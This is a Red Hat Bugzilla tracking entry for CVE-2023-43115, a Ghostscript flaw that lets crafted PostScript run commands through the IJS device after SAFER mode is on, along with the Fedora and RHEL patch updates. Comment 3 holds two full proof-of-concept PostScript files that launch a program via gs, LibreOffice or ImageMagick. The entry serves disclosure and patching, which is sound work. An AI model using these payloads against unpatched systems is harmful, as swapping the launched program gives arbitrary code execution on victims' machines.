Bug 2241108 (CVE-2023-43115)

Summary: CVE-2023-43115 Ghostscript: GhostPDL can lead to remote code execution via crafted PostScript documents
Product: [Other] Security Response Reporter: Dhananjay Arunesh <darunesh>
Component: vulnerabilityAssignee: Product Security <prodsec-ir-bot>
Status: NEW --- QA Contact:
Severity: high Docs Contact:
Priority: high    
Version: unspecifiedCC: alexander.neumann, bmason, daniel, pdwyer, xili
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: Doc Type: If docs needed, set a value
Doc Text:
A vulnerability was found in Artifex Ghostscript in gdevijs.c, allows a malicious remote attacker to perform remote code execution via crafted PostScript documents.
 Story Points: ---
Clone Of: Environment:
Last Closed: Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:
Bug Depends On: 2241112    
Bug Blocks: 2241109    

Description Dhananjay Arunesh 2023-09-28 06:36:11 UTC 
In Artifex Ghostscript through 10.01.2, gdevijs.c in GhostPDL can lead to remote code execution via crafted PostScript documents because they can switch to the IJS device, or change the IjsServer parameter, after SAFER has been activated.

References:
https://bugs.ghostscript.com/show_bug.cgi?id=707051
https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=e59216049cac290fb437a04c4f41ea46826cfba5
https://ghostscript.com/
Comment 1 Dhananjay Arunesh 2023-09-28 06:43:03 UTC 
Created ghostscript tracking bugs for this issue:

Affects: fedora-all [bug 2241112]
Comment 3 Alexander Neumann 2023-10-10 14:30:04 UTC 
So, what's the current status regarding this vulnerability?

This is highly critical: At the moment, on a fully updated Fedora 38, attackers can execute arbitrary commands when users open/use postscript files.

In the following, I'll describe two ways to exploit this (and start gnome-calculator as an example):

1. Run `gs calc.ps` with the following file (or insert it as an image in LibreOffice):

------------------
%!PS-Adobe-3.0 EPSF-3.0
%%Document-Fonts: Times-Roman
%%Title: print_version.eps
%%Creator: PS_Write.F
%%CreationDate: 02-Aug-99
%%Pages: 1
%%BoundingBox:   36   36  576  756
%%LanguageLevel: 1
%%EndComments
%%BeginProlog
%%EndProlog

<< /OutputDevice /ijs /IjsServer (gnome-calculator) >> setpagedevice
------------------

2. Via ImageMagick: run `convert calc-convert.ps calc-convert.png`:

------------------
%!PS-Adobe-3.0 EPSF-3.0
%%Document-Fonts: Times-Roman
%%Title: print_version.eps
%%Creator: PS_Write.F
%%CreationDate: 02-Aug-99
%%Pages: 1
%%BoundingBox:   36   36  576  756
%%LanguageLevel: 1
%%EndComments
%%BeginProlog
%%EndProlog

% this is somehow needed to not get a null pointer dereference (will basically initialize the ijs device a bit, and then complain about unset IjsServer):
{
(ijs) finddevice setdevice
} stopped {} {} ifelse
pop

% set ijserver to payload
{
mark /IjsServer (/usr/bin/gnome-calculator) (ijs) finddevice putdeviceprops setdevice
} stopped {} {} ifelse
pop
------------------

What's the plan here? :)
Comment 4 Alexander Neumann 2023-10-12 08:49:24 UTC 
Just to be clear: opening a LibreOffice document is enough to trigger the RCE: we've made a video here: https://twitter.com/RedTeamPT/status/1712379361146318896

Here's a video which shows the exploit for convert: https://twitter.com/RedTeamPT/status/1712379364136964411
Comment 5 Daniel Milnes 2023-10-13 22:25:58 UTC 
(In reply to Alexander Neumann from comment #4)
> Just to be clear: opening a LibreOffice document is enough to trigger the
> RCE: we've made a video here:
> https://twitter.com/RedTeamPT/status/1712379361146318896
> 
> Here's a video which shows the exploit for convert:
> https://twitter.com/RedTeamPT/status/1712379364136964411

Hey Alexander, thanks for flagging that this had been missed.

Updates to supported versions of Fedora (38: https://bodhi.fedoraproject.org/updates/FEDORA-2023-66d60c3df7, 39: https://bodhi.fedoraproject.org/updates/FEDORA-2023-c2665a9ff3) have been submitted, and will roll out once they have enough upvotes or time passes.

I've also proposed this as a Final Release Blocker for Fedora 39, so it should be fixed from day one there (https://pagure.io/fedora-qa/blocker-review/issue/1408).
Comment 6 Alexander Neumann 2023-10-16 06:56:39 UTC 
Cool, thanks for the feedback! We really appreciate your work!
Comment 7 errata-xmlrpc 2023-10-18 22:54:26 UTC 
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 9.0 Extended Update Support

Via RHSA-2023:5868 https://access.redhat.com/errata/RHSA-2023:5868
Comment 8 errata-xmlrpc 2023-11-02 09:31:26 UTC 
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 9

Via RHSA-2023:6265 https://access.redhat.com/errata/RHSA-2023:6265
Comment 9 errata-xmlrpc 2023-11-07 10:07:23 UTC 
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 9

Via RHSA-2023:6732 https://access.redhat.com/errata/RHSA-2023:6732